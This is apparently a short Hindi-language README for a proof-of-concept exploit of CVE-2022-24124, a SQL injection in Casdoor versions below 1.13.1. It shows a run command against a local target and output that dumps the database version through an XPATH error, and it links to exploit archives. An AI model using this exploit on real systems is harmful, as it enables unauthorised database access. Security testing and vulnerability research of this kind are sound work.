
POC for CVE-2022-24124
CVE-2022-24124 उर्फ Casdoor SQL Injection के लिए शोषण कोड
शोषण लिंक: [ExploitDB-50792] [PacketStormSecurity]
अपेक्षित परिणाम: Casdoor < 1.13.1 चलाने वाले होस्ट पर SQL डेटाबेस संस्करण डंप करें
केवल शैक्षिक और कॉर्पोरेट वातावरण में परीक्षण के लिए अभिप्रेत है।
Barricade➜ go run exploit.go -u http://127.0.0.1:8080
-=Casdoor SQL Injection (CVE-2022-24124)=-
- by Mayank Deshmukh (ColdFusionX)
[*] Dumping Database Version
XPATH syntax error: .12-MariaDB-0+deb11u1